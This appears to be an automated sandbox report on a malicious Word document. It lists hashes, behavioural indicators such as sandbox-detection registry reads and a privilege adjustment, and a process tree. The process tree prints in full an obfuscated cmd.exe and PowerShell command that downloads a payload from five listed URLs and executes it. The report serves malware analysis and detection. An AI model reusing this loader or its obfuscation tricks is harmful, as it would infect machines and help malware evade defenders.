Analysis
-
max time kernel
136s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 00:28
Behavioral task
behavioral1
Sample
621b8cdd17688f2ed0eb8f985f9463a6JaffaCakes118.doc
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
621b8cdd17688f2ed0eb8f985f9463a6JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
621b8cdd17688f2ed0eb8f985f9463a6JaffaCakes118.doc
-
Size
134KB
-
MD5
621b8cdd17688f2ed0eb8f985f9463a6
-
SHA1
d5fa8a2854e16f3b5663ec5adc1225a4408679c3
-
SHA256
4b4fbf3de37b71b5a81da84da06a2264dfec57b849e6f4ac5cb55197a05c540b
-
SHA512
cc1b8d6f1d5a8ab712ad46b002a02fd874a308a72e42223a23e20d926f27dcebc50c9bbdc95597f44c82d944824c42bfd29700dff4b436ebbea330020a534bee
-
SSDEEP
1536:9JL8ec0qe4PkTf560/hc+ah1CjN6lE/OH7841Pee2L6Dq+5A9lC6wtRDC0a7rqnn:ie4M160/hgkjOkL6DLwwtFC0pqLHLg
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 404 464 Cmd.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 15 4088 powershell.exe 24 4088 powershell.exe 101 4088 powershell.exe 103 4088 powershell.exe 116 4088 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 404 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 464 WINWORD.EXE 464 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4088 powershell.exe 4088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4088 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 464 WINWORD.EXE 464 WINWORD.EXE 464 WINWORD.EXE 464 WINWORD.EXE 464 WINWORD.EXE 464 WINWORD.EXE 464 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 464 wrote to memory of 404 464 WINWORD.EXE Cmd.exe PID 464 wrote to memory of 404 464 WINWORD.EXE Cmd.exe PID 404 wrote to memory of 4088 404 Cmd.exe powershell.exe PID 404 wrote to memory of 4088 404 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\621b8cdd17688f2ed0eb8f985f9463a6JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SYSTEM32\Cmd.exeCmd qCacJpzK aXMjOrbjcLdtjClIlIY wFwDvIQNpS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %vLdlwtPRzUGwzzj%=fUfNRXCBzctC&&set %JlqCGdNLf%=p&&set %UvQizJMohMOXdK%=o^w&&set %ubzaElQcSmwFsYF%=NsolmmsV&&set %aMBrVvWvLfXK%=!%JlqCGdNLf%!&&set %kmbXIblVzNXVVju%=jETtWZVt&&set %mrMwFIRnwwmYmb%=e^r&&set %rGnKwKir%=!%UvQizJMohMOXdK%!&&set %VtbGPkGTBqN%=s&&set %RvoHoIQIiipRKsT%=AdFfBjljzcFhS&&set %ddwmIjG%=he&&set %mAMaqDHTiM%=ll&&!%aMBrVvWvLfXK%!!%rGnKwKir%!!%mrMwFIRnwwmYmb%!!%VtbGPkGTBqN%!!%ddwmIjG%!!%mAMaqDHTiM%! "('EmVnsada'+'s'+'d = &(QbvnQb'+'v'+'+QbveQbv+'+'Qbvw-'+'objec'+'Qbv+QbvtQ'+'bv'+') ra'+'ndom'+';Em'+'VYYU = .(Qbvne'+'Qbv+Q'+'b'+'vwQbv+Q'+'bv-objec'+'tQbv) S'+'ystem.N'+'et.'+'WebClient;E'+'mVNSB = EmVnsadasd'+'.next'+'(100'+'00,'+' 2821'+'33);Em'+'V'+'ADCX ='+' Qbv'+' http:'+'//'+'thurtell.com/R5FTbS'+'/@http:/'+'/'+'hireatr'+'adesman.co'+'m'+'.au/UkA'+'7'+'V'+'/'+'@http:'+'/'+'/'+'tigge'+'rne'+'ss.net/NN'+'3U'+'bF/@http://lunarianar'+'t.com/'+'b'+'k'+'li'+'/@'+'http://aly'+'n'+'fi'+'res'+'.co.uk/8'+'ckoG'+'S'+'/'+'Qbv.'+'Spli'+'t(Qbv@Qbv);EmVSDC'+' = '+'EmVenv:pu'+'bl'+'ic + QbvM'+'GeQ'+'b'+'v + Em'+'VNS'+'B'+' + (Q'+'bv'+'.'+'e'+'xQbv+Qbve'+'Qbv)'+';f'+'ore'+'ach('+'EmVas'+'fc'+' i'+'n Em'+'VADCX){'+'try'+'{'+'E'+'mVY'+'YU.u7qDo'+'SAuW'+'nlSAuOadFI'+'SAuleu7q(E'+'mVasf'+'c.u7qToStrSAuiSAuNgu7q(),'+' Em'+'VSDC);&(QbvI'+'nvoQbv+'+'Q'+'bv'+'kQbv+Qbve-It'+'emQb'+'v)(Em'+'VSDC)'+';'+'bre'+'ak;}c'+'atch{}}').RePLAce('Qbv',[STRING][Char]39).RePLAce('u7q',[STRING][Char]34).RePLAce('SAu','`').RePLAce('MGe','\').RePLAce('EmV',[STRING][Char]36) |. ((vARiabLe '*mDr*').NaMe[3,11,2]-jOIN'')2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "('EmVnsada'+'s'+'d = &(QbvnQb'+'v'+'+QbveQbv+'+'Qbvw-'+'objec'+'Qbv+QbvtQ'+'bv'+') ra'+'ndom'+';Em'+'VYYU = .(Qbvne'+'Qbv+Q'+'b'+'vwQbv+Q'+'bv-objec'+'tQbv) S'+'ystem.N'+'et.'+'WebClient;E'+'mVNSB = EmVnsadasd'+'.next'+'(100'+'00,'+' 2821'+'33);Em'+'V'+'ADCX ='+' Qbv'+' http:'+'//'+'thurtell.com/R5FTbS'+'/@http:/'+'/'+'hireatr'+'adesman.co'+'m'+'.au/UkA'+'7'+'V'+'/'+'@http:'+'/'+'/'+'tigge'+'rne'+'ss.net/NN'+'3U'+'bF/@http://lunarianar'+'t.com/'+'b'+'k'+'li'+'/@'+'http://aly'+'n'+'fi'+'res'+'.co.uk/8'+'ckoG'+'S'+'/'+'Qbv.'+'Spli'+'t(Qbv@Qbv);EmVSDC'+' = '+'EmVenv:pu'+'bl'+'ic + QbvM'+'GeQ'+'b'+'v + Em'+'VNS'+'B'+' + (Q'+'bv'+'.'+'e'+'xQbv+Qbve'+'Qbv)'+';f'+'ore'+'ach('+'EmVas'+'fc'+' i'+'n Em'+'VADCX){'+'try'+'{'+'E'+'mVY'+'YU.u7qDo'+'SAuW'+'nlSAuOadFI'+'SAuleu7q(E'+'mVasf'+'c.u7qToStrSAuiSAuNgu7q(),'+' Em'+'VSDC);&(QbvI'+'nvoQbv+'+'Q'+'bv'+'kQbv+Qbve-It'+'emQb'+'v)(Em'+'VSDC)'+';'+'bre'+'ak;}c'+'atch{}}').RePLAce('Qbv',[STRING][Char]39).RePLAce('u7q',[STRING][Char]34).RePLAce('SAu','`').RePLAce('MGe','\').RePLAce('EmV',[STRING][Char]36) |. ((vARiabLe '*mDr*').NaMe[3,11,2]-jOIN'')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
178B
MD5b24fee4a31e59e4a1dff7a7d19338f4c
SHA1b124f421c3a2868d2b26303ac8628b3da6908426
SHA2562cd62fb6d1b121f6ceba678a42923a357c563eaf065dd8d43f722817208e2477
SHA5126cd94cad1039ef5a7e7d662a802b0b32689f6b9f68fd4a7060e0847f7109759c75afb34dd32b12e10b493c9885d5f448394e35ad4fbef33159f787e7be9ea02e
-
Filesize
1KB
MD57401942fe6b4856b5613c6e0f2d44dbf
SHA1b3b5e6001d051b203a7c80f5702fb1c0441251f4
SHA2563f9eedea50a8b842b97307d49615ddd6c6657e7dcafe906bcfc346ddf177bfe4
SHA5124bf64677505080d01c2ee02cf8a9eab33b864f83bfb2d8a022672f23b73a891f10a14a8db9ac0696735410f56c8db3582451d4a7def271500827329c06da6ca0
-
Filesize
5KB
MD57c31920038846d59a40ba4da849eb7c4
SHA1455419df84213e0421425de64ce6c008904ff78e
SHA25614eb535d681a2d4235d23a72728538fe906027c17c1b6dd71680187d9c5accc5
SHA512b37cac383788f36baba996a2cc6324241ad6f8d84eea2d5bc85794ec0d1d4b4a0234bc21ac1fca2e1a416768bf8137452fae15e9f177f7f84f32f7a81d20b70a